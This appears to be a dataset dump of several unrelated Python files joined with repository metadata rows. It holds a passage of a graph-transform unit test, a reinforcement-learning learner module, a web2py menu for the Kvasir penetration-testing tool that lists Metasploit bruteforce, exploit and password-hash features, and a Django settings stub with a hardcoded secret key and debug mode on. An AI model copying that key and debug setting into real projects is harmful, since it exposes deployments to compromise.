graph_ref = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_down'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_down', 'transpose'),
*connect('transpose', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_down')
reverse_channels.axis = int64_array(-3)
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
reverse_channels = Node(graph, 'reverse_channels_down')
self.assertTrue(reverse_channels.axis == 3)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_lift_down_through_transpose_negative_axis(self):
graph = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_up'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_up', '0:transpose'),
*connect('transpose', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', '0:transpose'),
*connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_up'),
*connect('reverse_channels_up', '0:result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_up')
reverse_channels.axis = int64_array(-1)
keep_moving_down = ReverseChannelsPropagationDown.pass_rc_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_down is True)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
        reverse_channels = Node(graph, 'reverse_channels_up')
self.assertTrue(reverse_channels.axis == 1)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_insert(self):
graph = build_graph(get_nodes([1, 3, 10, 10]),
[*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'result')], nodes_with_edges_only=True,
cli=Namespace(reverse_input_channels=True))
InsertReverseChannels().find_and_replace_pattern(graph)
graph_ref = build_graph(get_nodes([1, 3, 10, 10]),
[*connect('placeholder1', 'reverse_channels'), *connect('reverse_channels', '0:mul'),
*connect('placeholder2', '1:mul'), *connect('mul', 'result')])
(flag, resp) = compare_graphs(graph, graph_ref, 'result', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_insert_old_api_map(self):
graph = build_graph(get_nodes([1, 10, 10, 3]),
[*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'result')], nodes_with_edges_only=True,
cli=Namespace(reverse_input_channels=True))
node = Node(graph, 'placeholder1')
old_api_map = OldAPIMapOrder(version=0)
node.rt_info.info[('old_api_map_order', old_api_map.get_version())] = old_api_map
node.rt_info.info[('old_api_map_order', old_api_map.get_version())].old_api_transpose_parameter([0, 2, 3, 1])
InsertReverseChannels().find_and_replace_pattern(graph)
graph_ref = build_graph(get_nodes([1, 10, 10, 3], 3),
[*connect('placeholder1', 'reverse_channels'), *connect('reverse_channels', '0:mul'),
*connect('placeholder2', '1:mul'), *connect('mul', 'result')])
node2 = Node(graph_ref, 'placeholder1')
node2.rt_info = node.rt_info
(flag, resp) = compare_graphs(graph, graph_ref, 'result', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_insert_layout(self):
graph = build_graph(get_nodes([1, 10, 10, 3]),
[*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'result')], nodes_with_edges_only=True,
cli=Namespace(reverse_input_channels=True,
layout_values={
'placeholder1': {'source_layout': 'nhwc', 'target_layout': None}}))
InsertReverseChannels().find_and_replace_pattern(graph)
graph_ref = build_graph(get_nodes([1, 10, 10, 3], 3),
[*connect('placeholder1', 'reverse_channels'), *connect('reverse_channels', '0:mul'),
*connect('placeholder2', '1:mul'), *connect('mul', 'result')])
(flag, resp) = compare_graphs(graph, graph_ref, 'result', check_op_attrs=True)
self.assertTrue(flag, resp)
| true
| true
|
1c3e9590f25c453699d93c4863127de74e780963
| 7,493
|
py
|
Python
|
starter_code/learner/learners.py
|
mbchang/societal-decision-making
|
23fd6de4df33f985d360330a9d5a2c29faeb8e52
|
[
"MIT"
] | 38
|
2020-08-17T14:18:22.000Z
|
2022-02-27T13:12:40.000Z
|
starter_code/learner/learners.py
|
mbchang/societal-decision-making
|
23fd6de4df33f985d360330a9d5a2c29faeb8e52
|
[
"MIT"
] | 3
|
2021-06-08T22:17:35.000Z
|
2022-03-12T00:46:27.000Z
|
starter_code/learner/learners.py
|
mbchang/societal-decision-making
|
23fd6de4df33f985d360330a9d5a2c29faeb8e52
|
[
"MIT"
] | 3
|
2020-08-21T05:28:35.000Z
|
2022-03-31T17:07:48.000Z
|
from collections import OrderedDict
from starter_code.learner.learner import Learner
from starter_code.infrastructure.log import log_string, MinigridEnvManager
from starter_code.interfaces.transitions import AgentStepInfo, OptionStepInfo, AuctionStepInfo, OptionAuctionStepInfo
from starter_code.sampler.decentralized_sampler import DecentralizedSampler
from starter_code.sampler.domain_specific_temporary_buffers import DecentralizedHRLStatsCollector, DecentralizedTabularStatsCollector
from starter_code.sampler.hierarchy_utils import is_hierarchical
from starter_code.sampler.sampler import Sampler
from starter_code.sampler.temporary_buffer import DecentralizedStatsCollector, StatsCollector
def computation_sampler_builder(base_class):
class ComputationSampler(base_class):
def finish_episode(self, state, episode_data, env):
output = state
reward = env.apply_loss(output).item()
# assign reward to last step
episode_data[-1].hierarchy_info.set_reward(reward)
episode_data[-1].set_reward(reward)
episode_data = base_class.finish_episode(self, state, episode_data, env)
return episode_data
return ComputationSampler
class CentralizedLearner(Learner):
def __init__(self, organism, rl_alg, logger, device, args):
Learner.__init__(self, organism, rl_alg, logger, device, args)
if organism.transformation_type == 'FunctionTransformation':
sampler_builder = computation_sampler_builder(Sampler)
else:
sampler_builder = Sampler
if organism.transformation_type == 'SubpolicyTransformation':
step_info = OptionStepInfo
else:
step_info = AgentStepInfo
self.stats_collector_builder = StatsCollector
self.sampler = sampler_builder(
organism=organism,
step_info=step_info,
deterministic=False,
)
class DecentralizedLearner(Learner):
def __init__(self, organism, rl_alg, logger, device, args):
Learner.__init__(self, organism, rl_alg, logger, device, args)
if organism.transformation_type == 'FunctionTransformation':
sampler_builder = computation_sampler_builder(DecentralizedSampler)
else:
sampler_builder = DecentralizedSampler
if organism.transformation_type == 'SubpolicyTransformation':
step_info = OptionAuctionStepInfo
else:
step_info = AuctionStepInfo
# domain specific
if 'BabyAI' in args.env_name[0]:
self.stats_collector_builder = DecentralizedHRLStatsCollector
else:
self.stats_collector_builder = DecentralizedStatsCollector
self.sampler = sampler_builder(
organism=organism,
step_info=step_info,
deterministic=False,
)
def get_qualitative_output(self, env_manager, sampler, episode_data, epoch, i):
Learner.get_qualitative_output(self, env_manager, sampler, episode_data, epoch, i)
if env_manager.visual and isinstance(env_manager, MinigridEnvManager):
"""
time t | state | high-level action | high-level winner | high-level bids | high-level payoffs | high-level reward | low-level action | next_state | low-level reward |
time t+1 | state | high-level action | high-level winner | high-level bids | high-level payoffs | high-level reward | low-level action | next_state | low-level reward |
"""
print_keys = ['Epoch', epoch]
print_values = []
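            # Recursively walk the hierarchical episode: non-leaf steps carry the
            # high-level auction info (action, winner, bids, payoffs, reward), which is
            # attached to every low-level step logged beneath them.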
def low_level_print(organism, episode_data, high_level_info_dict=None):
time=0
for step in episode_data:
if not step.hierarchy_info.leaf:
sub_organism = organism.transformations[step.hierarchy_info.organism]
high_level_info_dict = dict(
action=step.action,
winner=step.winner,
bids=['{}: {:.5f}'.format(a_id, bid) for a_id, bid in step.bids.items()],
payoffs=['{}: {:.5f}'.format(a_id, payoff) for a_id, payoff in step.payoffs.items()],
reward=str(step.reward),
t=time)
low_level_time = low_level_print(sub_organism, step.hierarchy_info.path_data, high_level_info_dict)
time+=low_level_time
else:
step_dict = OrderedDict(
t=str(time+high_level_info_dict['t']),
high_level_action = high_level_info_dict['action'] ,
high_level_winner = high_level_info_dict['winner'],
high_level_bids = high_level_info_dict['bids'],
high_level_payoffs = high_level_info_dict['payoffs'],
high_level_reward = high_level_info_dict['reward'] ,
low_level_action=step.action,
low_level_reward=str(step.reward),
room_num = step.state.room
)
keys, values = [], []
for key, value in step_dict.items():
keys.append(key)
values.append(value)
print_values.append(values)
self.logger.printf(log_string(step_dict))
time+=1
return time
low_level_print(self.organism, episode_data)
self.logger.save_print_csv(print_keys, print_values)
class TabularDecentralizedLearner(Learner):
def __init__(self, organism, rl_alg, logger, device, args):
Learner.__init__(self, organism, rl_alg, logger, device, args)
if organism.transformation_type == 'SubpolicyTransformation':
step_info = OptionAuctionStepInfo
else:
step_info = AuctionStepInfo
self.stats_collector_builder = DecentralizedTabularStatsCollector
self.sampler = DecentralizedSampler(
organism=organism,
step_info=step_info,
deterministic=False,
)
def get_qualitative_output(self, env_manager, sampler, episode_data, epoch, i):
"""
| time t | state | action | winner | bids | payoffs |
| time t+1 | state | action | winner | bids | payoffs |
"""
for t, step_data in enumerate(episode_data):
step_dict = OrderedDict(
t='{}\t'.format(t),
state=env_manager.env.from_onehot(step_data.state),
action=step_data.action,
next_state=env_manager.env.from_onehot(step_data.next_state),
reward='{}\t'.format(step_data.reward),
mask=step_data.mask)
if hasattr(step_data, 'bids'):
assert hasattr(step_data, 'payoffs') and hasattr(step_data, 'winner')
step_dict['winner'] = step_data.winner
step_dict['bids'] = ', '.join(['{}: {:.5f}'.format(a_id, bid) for a_id, bid in step_data.bids.items()])
step_dict['payoffs'] = ', '.join(['{}: {:.5f}'.format(a_id, payoff) for a_id, payoff in step_data.payoffs.items()])
self.logger.printf(log_string(step_dict))
| 48.341935
| 180
| 0.613506
|
from collections import OrderedDict
from starter_code.learner.learner import Learner
from starter_code.infrastructure.log import log_string, MinigridEnvManager
from starter_code.interfaces.transitions import AgentStepInfo, OptionStepInfo, AuctionStepInfo, OptionAuctionStepInfo
from starter_code.sampler.decentralized_sampler import DecentralizedSampler
from starter_code.sampler.domain_specific_temporary_buffers import DecentralizedHRLStatsCollector, DecentralizedTabularStatsCollector
from starter_code.sampler.hierarchy_utils import is_hierarchical
from starter_code.sampler.sampler import Sampler
from starter_code.sampler.temporary_buffer import DecentralizedStatsCollector, StatsCollector
def computation_sampler_builder(base_class):
class ComputationSampler(base_class):
def finish_episode(self, state, episode_data, env):
output = state
reward = env.apply_loss(output).item()
episode_data[-1].hierarchy_info.set_reward(reward)
episode_data[-1].set_reward(reward)
episode_data = base_class.finish_episode(self, state, episode_data, env)
return episode_data
return ComputationSampler
class CentralizedLearner(Learner):
def __init__(self, organism, rl_alg, logger, device, args):
Learner.__init__(self, organism, rl_alg, logger, device, args)
if organism.transformation_type == 'FunctionTransformation':
sampler_builder = computation_sampler_builder(Sampler)
else:
sampler_builder = Sampler
if organism.transformation_type == 'SubpolicyTransformation':
step_info = OptionStepInfo
else:
step_info = AgentStepInfo
self.stats_collector_builder = StatsCollector
self.sampler = sampler_builder(
organism=organism,
step_info=step_info,
deterministic=False,
)
class DecentralizedLearner(Learner):
def __init__(self, organism, rl_alg, logger, device, args):
Learner.__init__(self, organism, rl_alg, logger, device, args)
if organism.transformation_type == 'FunctionTransformation':
sampler_builder = computation_sampler_builder(DecentralizedSampler)
else:
sampler_builder = DecentralizedSampler
if organism.transformation_type == 'SubpolicyTransformation':
step_info = OptionAuctionStepInfo
else:
step_info = AuctionStepInfo
if 'BabyAI' in args.env_name[0]:
self.stats_collector_builder = DecentralizedHRLStatsCollector
else:
self.stats_collector_builder = DecentralizedStatsCollector
self.sampler = sampler_builder(
organism=organism,
step_info=step_info,
deterministic=False,
)
def get_qualitative_output(self, env_manager, sampler, episode_data, epoch, i):
Learner.get_qualitative_output(self, env_manager, sampler, episode_data, epoch, i)
if env_manager.visual and isinstance(env_manager, MinigridEnvManager):
print_keys = ['Epoch', epoch]
print_values = []
def low_level_print(organism, episode_data, high_level_info_dict=None):
time=0
for step in episode_data:
if not step.hierarchy_info.leaf:
sub_organism = organism.transformations[step.hierarchy_info.organism]
high_level_info_dict = dict(
action=step.action,
winner=step.winner,
bids=['{}: {:.5f}'.format(a_id, bid) for a_id, bid in step.bids.items()],
payoffs=['{}: {:.5f}'.format(a_id, payoff) for a_id, payoff in step.payoffs.items()],
reward=str(step.reward),
t=time)
low_level_time = low_level_print(sub_organism, step.hierarchy_info.path_data, high_level_info_dict)
time+=low_level_time
else:
step_dict = OrderedDict(
t=str(time+high_level_info_dict['t']),
high_level_action = high_level_info_dict['action'] ,
high_level_winner = high_level_info_dict['winner'],
high_level_bids = high_level_info_dict['bids'],
high_level_payoffs = high_level_info_dict['payoffs'],
high_level_reward = high_level_info_dict['reward'] ,
low_level_action=step.action,
low_level_reward=str(step.reward),
room_num = step.state.room
)
keys, values = [], []
for key, value in step_dict.items():
keys.append(key)
values.append(value)
print_values.append(values)
self.logger.printf(log_string(step_dict))
time+=1
return time
low_level_print(self.organism, episode_data)
self.logger.save_print_csv(print_keys, print_values)
class TabularDecentralizedLearner(Learner):
def __init__(self, organism, rl_alg, logger, device, args):
Learner.__init__(self, organism, rl_alg, logger, device, args)
if organism.transformation_type == 'SubpolicyTransformation':
step_info = OptionAuctionStepInfo
else:
step_info = AuctionStepInfo
self.stats_collector_builder = DecentralizedTabularStatsCollector
self.sampler = DecentralizedSampler(
organism=organism,
step_info=step_info,
deterministic=False,
)
def get_qualitative_output(self, env_manager, sampler, episode_data, epoch, i):
for t, step_data in enumerate(episode_data):
step_dict = OrderedDict(
t='{}\t'.format(t),
state=env_manager.env.from_onehot(step_data.state),
action=step_data.action,
next_state=env_manager.env.from_onehot(step_data.next_state),
reward='{}\t'.format(step_data.reward),
mask=step_data.mask)
if hasattr(step_data, 'bids'):
assert hasattr(step_data, 'payoffs') and hasattr(step_data, 'winner')
step_dict['winner'] = step_data.winner
step_dict['bids'] = ', '.join(['{}: {:.5f}'.format(a_id, bid) for a_id, bid in step_data.bids.items()])
step_dict['payoffs'] = ', '.join(['{}: {:.5f}'.format(a_id, payoff) for a_id, payoff in step_data.payoffs.items()])
self.logger.printf(log_string(step_dict))
| true
| true
|
1c3e966b1c5c70d1bbee3ae15b82d627d6a88bb5
| 192
|
py
|
Python
|
Mock/Midterm/q1c-unnerfed.py
|
RussellDash332/practice-makes-perfect
|
917822b461550a2e3679351e467362f95d9e428d
|
[
"MIT"
] | 2
|
2021-11-18T06:22:09.000Z
|
2021-12-25T09:52:57.000Z
|
Mock/Midterm/q1c-unnerfed.py
|
RussellDash332/practice-makes-perfect
|
917822b461550a2e3679351e467362f95d9e428d
|
[
"MIT"
] | 2
|
2021-11-17T16:28:00.000Z
|
2021-12-01T09:59:40.000Z
|
Mock/Midterm/q1c-unnerfed.py
|
RussellDash332/practice-makes-perfect
|
917822b461550a2e3679351e467362f95d9e428d
|
[
"MIT"
] | null | null | null |
m, p = "mutton", "python"
mp = m+p+"ton"
if "on" in mp:
if p in mp:
p = "p"
print("yum")
if "on" in p:
print("bum")
elif mp:
print("tum")
| 17.454545
| 26
| 0.390625
|
m, p = "mutton", "python"
mp = m+p+"ton"
if "on" in mp:
if p in mp:
p = "p"
print("yum")
if "on" in p:
print("bum")
elif mp:
print("tum")
| true
| true
|
1c3e96a2f308439d029d90059fce07c86e844515
| 7,848
|
py
|
Python
|
models/menu.py
|
juushya/Kvasir
|
bc9fa5864ed1cf40a3a4fe2dae7f24f754267c78
|
[
"BSD-3-Clause"
] | null | null | null |
models/menu.py
|
juushya/Kvasir
|
bc9fa5864ed1cf40a3a4fe2dae7f24f754267c78
|
[
"BSD-3-Clause"
] | null | null | null |
models/menu.py
|
juushya/Kvasir
|
bc9fa5864ed1cf40a3a4fe2dae7f24f754267c78
|
[
"BSD-3-Clause"
] | null | null | null |
_a = request.application
response.logo = A(B('KVASIR'), _class="brand")
response.title = settings.title
response.subtitle = settings.subtitle
response.meta.author = '%s <%s>' % (settings.author, settings.author_email)
response.meta.keywords = settings.keywords
response.meta.description = settings.description
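# Each menu entry is a web2py (label, is_active, url, submenu) tuple; an empty url string
# marks a parent item that only expands its submenu.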
response.menu = [
(T('Home'), False, URL(_a,'default','index'), []),
# (A(I(_class='icon-home icon-white'), T('Home'), _href=URL('default', 'index')), False, []),
(T('All Hosts'), False, URL(_a,'hosts','list'), []),
# (A(I(_class='icon-th-list icon-white'), T('All Hosts'), _href=URL('hosts', 'list')), False, []),
(T('Host Data'), False, '',
[
(T('Add Host'), False, URL(_a,'hosts','add'), []),
(T('Services'), False, '',
[
(T('List All'), False, URL(_a,'services','list'), []),
#(T('All w/ Vulns'), False, URL(_a,'vulns','service_vulns_list'), []), # TODO: service_vulns_list
(T('IPs w/ Port'), False, URL(_a,'services','hosts_with_port'), []),
(T('Add'), False, URL(_a,'services','add'), []),
]),
(T('Accounts'), False, '',
[
(T('List'), False, URL(_a,'accounts', 'list'), []),
(T('Add'), False, URL(_a,'accounts', 'add'), []),
(T('Import File'), False, URL(_a,'accounts', 'import_file'), []),
(T('Mass Import'), False, URL(_a,'accounts', 'import_mass_password'), []),
(T('Process crack file'), False, URL(_a,'accounts', 'update_hashes_by_file'), []),
(T('Process john.pot'), False, URL(_a,'accounts', 'check_john_pot'), []),
]),
(T('NetBIOS'), False, '',
[
(T('Domain Details'), False, URL(_a,'netbios','domain_detail'), []),
(T('List'), False, URL(_a,'netbios','index'), []),
(T('Add'), False, URL(_a,'netbios','add'), []),
]),
(T('OS'), False, '',
[
(T('List'), False, URL(_a,'os','list'), []),
(T('Add '), False, URL(_a,'os','add'), []),
(T('List OS Refs'), False, URL(_a,'os','refs_list'), []),
(T('Add OS Ref'), False, URL(_a,'os','refs_add'), []),
]),
(T('Other'), False, '',
[
(T('List Evidence'), False, URL(_a,'evidence','list'), []),
(T('List Notes'), False, URL(_a,'notes','list'), []),
(T('List SNMP'), False, URL(_a,'snmp','list'), []),
(T('List Tool Output'), False, URL(_a,'tooloutput','list'), []),
(T('CSV Hostname Update'), False, URL(_a,'hosts','csv_hostupdate'), []),
]),
]),
(T('Tasks'), False, URL(_a,'tasks','index'), []),
(T('Metasploit'), False, '',
[
(T('Mass Jobs'), False, '',
[
(T('Bruteforce'), False, URL(_a, 'metasploit', 'bruteforce'), []),
(T('Exploit'), False, URL(_a, 'metasploit', 'exploit'), []),
]),
(T('Imports'), False, '',
[
(T('PWDUMP Files'), False, URL(_a, 'metasploit', 'import_pwdump'), []),
(T('Screenshots'), False, URL(_a, 'metasploit', 'import_screenshots'), []),
(T('Report XML'), False, URL(_a, 'metasploit', 'import_report_xml'), []),
]),
(T('Send Accounts'), False, URL(_a, 'metasploit', 'send_accounts'), []),
(T('Send Scan XML Files'), False, URL(_a, 'metasploit', 'send_scanxml'), []),
(T('API Settings'), False, URL(_a, 'metasploit', 'api_settings'), []),
#(T('Tasks'), False, URL(_a, 'metasploit', 'task_list'), []),
]),
(T('Other'), False, '',
[
(T('Browse Data Directory'), False, URL(_a, 'default', 'data_dir'), []),
(T('Customer XML'),URL(_a,'report','customer_xml.xml')==URL(),URL(_a,'report','customer_xml.xml'),[]),
(T('Stats XLS'),URL(_a,'report','spreadsheet')==URL(),URL(_a,'report','spreadsheet'),[]),
(T('Wiki'),URL(_a,'default','wiki')==URL(),URL(_a,'default','wiki'),[]),
(T('Update DB Fields'),URL(_a,'default','update_dynamic_fields')==URL(),URL(_a,'default','update_dynamic_fields'),[]),
(T('IP Calculator'), False, URL(_a, 'default', 'ip_calc'), []),
(T('Exploit Database (local)'), False, URL(_a, 'exploitdb', 'index'), []),
(T('PwnWiki'), False, URL(_a, 'default', 'redirect', vars={'url':settings.pwnwiki_path, 'pwnwiki': True}), []),
]),
(T('Statistics'), False, '',
[
(T('Vulnlist'), False, URL(_a,'stats','vulnlist'), []),
(T('Passwords'), False, URL(_a,'stats','passwords'), []),
(T('OS'), False, URL(_a,'stats','os'), []),
(T('Services'), False, URL(_a,'stats','services'), []),
(T('VulnCircles'), False, URL(_a,'stats','vulncircles'), []),
]),
(T('Import'), False ,'',
[
(T('Nexpose XML'), False, URL(_a,'nexpose','import_xml_scan'), []),
(T('Nmap XML'), False, URL(_a,'nmap','import_xml_scan'), []),
(T('Nmap Scan and Import'), False, URL(_a,'nmap','nmap_scan'), []),
(T('Nessus Scanfile'), False, URL(_a,'nessus','import_scan'), []),
(T('hping File'), False, URL(_a,'hping','import_scan'), []),
(T('Metasploit XML'), False, URL(_a, 'metasploit', 'import_report_xml'), []),
(T('ShodanHQ'), False, URL(_a, 'shodanhq', 'import_report'), []),
]),
(T('Administration'), False, '',
[
(T('Nexpose'), False, '',
[
(T('Install/Update VulnData'),URL(_a,'nexpose','vuln_update')==URL(),URL(_a,'nexpose','vuln_update'),[]),
#(T('Import Scan Template '),URL(_a,'nexpose','scan_template')==URL(),URL(_a,'nexpose','scan_template'),[]),
(T('Import VulnID'), False, URL(_a, 'nexpose', 'import_vulnid'), []),
(T('Import Exploit XML'),URL(_a,'exploits','import_nexpose_xml')==URL(),URL(_a,'exploits','import_nexpose_xml'),[]),
(T('Purge Nexpose Data'),URL(_a,'nexpose','purge')==URL(),URL(_a,'nexpose','purge'),[]),
]),
(T('VulnDB'), False, '',
[
(T('Vulnerabilities'), False, URL(_a,'vulns','vulndata_list'),[]),
(T('Add Vulnerability'), False, URL(_a,'vulns','vulndata_add'),[]),
(T('References'), False, URL(_a,'vulns','vuln_refs'),[]),
(T('Vuln->Reference Links'), False, URL(_a,'vulns','vuln_references_list'),[]),
(T('Exploits'), False, URL(_a,'exploits','list'),[]),
(T('Connect Vulns/Exploits'), False, URL(_a,'exploits','connect_exploits'), []),
(T('Import Nexpose Exploits'), False, URL(_a,'exploits','import_nexpose_xml'),[]),
(T('Import CANVAS Exploits'), False, URL(_a,'exploits','import_canvas_xml'),[]),
]),
(T('CPE Database'), False, '',
[
(T('Import CPE Data'), False, URL(_a,'cpe','import_cpe_xml'), []),
(T('List OS DB'), False, URL(_a,'cpe','os_list'), []),
(T('Add OS'), False, URL(_a,'cpe','os_add'), []),
#(T('List Application DB'), False, URL(_a,'cpe','apps_list'), []),
#(T('Add Application'), False, URL(_a,'cpe','apps_add'), []),
#(T('List Hardware DB'), False, URL(_a,'cpe','hardware_list'), []),
#(T('Add Hardware'), False, URL(_a,'cpe','hardware_add'), []),
(T('Purge CPE DB'), False, URL(_a,'cpe','purge'), []),
]),
(T('Last Resort'), False, '',
[
(T('CSV Backup'), False, URL(_a,'default','database_backup'),[]),
(T('CSV Restore'), False, URL(_a,'default','database_restore'),[]),
(T('Purge Data'), URL(_a,'default','purge_data')==URL(),URL(_a,'default','purge_data'),[]),
]),
]),
]
| 53.753425
| 130
| 0.49554
|
_a = request.application
response.logo = A(B('KVASIR'), _class="brand")
response.title = settings.title
response.subtitle = settings.subtitle
response.meta.author = '%s <%s>' % (settings.author, settings.author_email)
response.meta.keywords = settings.keywords
response.meta.description = settings.description
response.menu = [
(T('Home'), False, URL(_a,'default','index'), []),
(T('All Hosts'), False, URL(_a,'hosts','list'), []),
(T('Host Data'), False, '',
[
(T('Add Host'), False, URL(_a,'hosts','add'), []),
(T('Services'), False, '',
[
(T('List All'), False, URL(_a,'services','list'), []),
                (T('IPs w/ Port'), False, URL(_a,'services','hosts_with_port'), []),
(T('Add'), False, URL(_a,'services','add'), []),
]),
(T('Accounts'), False, '',
[
(T('List'), False, URL(_a,'accounts', 'list'), []),
(T('Add'), False, URL(_a,'accounts', 'add'), []),
(T('Import File'), False, URL(_a,'accounts', 'import_file'), []),
(T('Mass Import'), False, URL(_a,'accounts', 'import_mass_password'), []),
(T('Process crack file'), False, URL(_a,'accounts', 'update_hashes_by_file'), []),
(T('Process john.pot'), False, URL(_a,'accounts', 'check_john_pot'), []),
]),
(T('NetBIOS'), False, '',
[
(T('Domain Details'), False, URL(_a,'netbios','domain_detail'), []),
(T('List'), False, URL(_a,'netbios','index'), []),
(T('Add'), False, URL(_a,'netbios','add'), []),
]),
(T('OS'), False, '',
[
(T('List'), False, URL(_a,'os','list'), []),
(T('Add '), False, URL(_a,'os','add'), []),
(T('List OS Refs'), False, URL(_a,'os','refs_list'), []),
(T('Add OS Ref'), False, URL(_a,'os','refs_add'), []),
]),
(T('Other'), False, '',
[
(T('List Evidence'), False, URL(_a,'evidence','list'), []),
(T('List Notes'), False, URL(_a,'notes','list'), []),
(T('List SNMP'), False, URL(_a,'snmp','list'), []),
(T('List Tool Output'), False, URL(_a,'tooloutput','list'), []),
(T('CSV Hostname Update'), False, URL(_a,'hosts','csv_hostupdate'), []),
]),
]),
(T('Tasks'), False, URL(_a,'tasks','index'), []),
(T('Metasploit'), False, '',
[
(T('Mass Jobs'), False, '',
[
(T('Bruteforce'), False, URL(_a, 'metasploit', 'bruteforce'), []),
(T('Exploit'), False, URL(_a, 'metasploit', 'exploit'), []),
]),
(T('Imports'), False, '',
[
(T('PWDUMP Files'), False, URL(_a, 'metasploit', 'import_pwdump'), []),
(T('Screenshots'), False, URL(_a, 'metasploit', 'import_screenshots'), []),
(T('Report XML'), False, URL(_a, 'metasploit', 'import_report_xml'), []),
]),
(T('Send Accounts'), False, URL(_a, 'metasploit', 'send_accounts'), []),
(T('Send Scan XML Files'), False, URL(_a, 'metasploit', 'send_scanxml'), []),
(T('API Settings'), False, URL(_a, 'metasploit', 'api_settings'), []),
]),
(T('Other'), False, '',
[
(T('Browse Data Directory'), False, URL(_a, 'default', 'data_dir'), []),
(T('Customer XML'),URL(_a,'report','customer_xml.xml')==URL(),URL(_a,'report','customer_xml.xml'),[]),
(T('Stats XLS'),URL(_a,'report','spreadsheet')==URL(),URL(_a,'report','spreadsheet'),[]),
(T('Wiki'),URL(_a,'default','wiki')==URL(),URL(_a,'default','wiki'),[]),
(T('Update DB Fields'),URL(_a,'default','update_dynamic_fields')==URL(),URL(_a,'default','update_dynamic_fields'),[]),
(T('IP Calculator'), False, URL(_a, 'default', 'ip_calc'), []),
(T('Exploit Database (local)'), False, URL(_a, 'exploitdb', 'index'), []),
(T('PwnWiki'), False, URL(_a, 'default', 'redirect', vars={'url':settings.pwnwiki_path, 'pwnwiki': True}), []),
]),
(T('Statistics'), False, '',
[
(T('Vulnlist'), False, URL(_a,'stats','vulnlist'), []),
(T('Passwords'), False, URL(_a,'stats','passwords'), []),
(T('OS'), False, URL(_a,'stats','os'), []),
(T('Services'), False, URL(_a,'stats','services'), []),
(T('VulnCircles'), False, URL(_a,'stats','vulncircles'), []),
]),
(T('Import'), False ,'',
[
(T('Nexpose XML'), False, URL(_a,'nexpose','import_xml_scan'), []),
(T('Nmap XML'), False, URL(_a,'nmap','import_xml_scan'), []),
(T('Nmap Scan and Import'), False, URL(_a,'nmap','nmap_scan'), []),
(T('Nessus Scanfile'), False, URL(_a,'nessus','import_scan'), []),
(T('hping File'), False, URL(_a,'hping','import_scan'), []),
(T('Metasploit XML'), False, URL(_a, 'metasploit', 'import_report_xml'), []),
(T('ShodanHQ'), False, URL(_a, 'shodanhq', 'import_report'), []),
]),
(T('Administration'), False, '',
[
(T('Nexpose'), False, '',
[
(T('Install/Update VulnData'),URL(_a,'nexpose','vuln_update')==URL(),URL(_a,'nexpose','vuln_update'),[]),
(T('Import VulnID'), False, URL(_a, 'nexpose', 'import_vulnid'), []),
(T('Import Exploit XML'),URL(_a,'exploits','import_nexpose_xml')==URL(),URL(_a,'exploits','import_nexpose_xml'),[]),
(T('Purge Nexpose Data'),URL(_a,'nexpose','purge')==URL(),URL(_a,'nexpose','purge'),[]),
]),
(T('VulnDB'), False, '',
[
(T('Vulnerabilities'), False, URL(_a,'vulns','vulndata_list'),[]),
(T('Add Vulnerability'), False, URL(_a,'vulns','vulndata_add'),[]),
(T('References'), False, URL(_a,'vulns','vuln_refs'),[]),
(T('Vuln->Reference Links'), False, URL(_a,'vulns','vuln_references_list'),[]),
(T('Exploits'), False, URL(_a,'exploits','list'),[]),
(T('Connect Vulns/Exploits'), False, URL(_a,'exploits','connect_exploits'), []),
(T('Import Nexpose Exploits'), False, URL(_a,'exploits','import_nexpose_xml'),[]),
(T('Import CANVAS Exploits'), False, URL(_a,'exploits','import_canvas_xml'),[]),
]),
(T('CPE Database'), False, '',
[
(T('Import CPE Data'), False, URL(_a,'cpe','import_cpe_xml'), []),
(T('List OS DB'), False, URL(_a,'cpe','os_list'), []),
(T('Add OS'), False, URL(_a,'cpe','os_add'), []),
(T('Purge CPE DB'), False, URL(_a,'cpe','purge'), []),
]),
(T('Last Resort'), False, '',
[
(T('CSV Backup'), False, URL(_a,'default','database_backup'),[]),
(T('CSV Restore'), False, URL(_a,'default','database_restore'),[]),
(T('Purge Data'), URL(_a,'default','purge_data')==URL(),URL(_a,'default','purge_data'),[]),
]),
]),
]
| true
| true
|
1c3e9722782b9f83edcb11429ff520945f9729f7
| 2,066
|
py
|
Python
|
example/app/settings.py
|
jbking/django-oidc-provider
|
f0daed07b2ac7608565b80d4c80ccf04d8c416a8
|
[
"MIT"
] | 370
|
2015-03-10T03:12:53.000Z
|
2022-03-13T05:49:40.000Z
|
example/app/settings.py
|
jbking/django-oidc-provider
|
f0daed07b2ac7608565b80d4c80ccf04d8c416a8
|
[
"MIT"
] | 305
|
2015-02-12T17:58:26.000Z
|
2022-02-25T19:48:41.000Z
|
example/app/settings.py
|
jbking/django-oidc-provider
|
f0daed07b2ac7608565b80d4c80ccf04d8c416a8
|
[
"MIT"
] | 271
|
2015-03-17T00:57:22.000Z
|
2022-02-17T11:21:22.000Z
|
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
SECRET_KEY = 'c14d549c574e4d8cf162404ef0b04598'
DEBUG = True
TEMPLATE_DEBUG = False
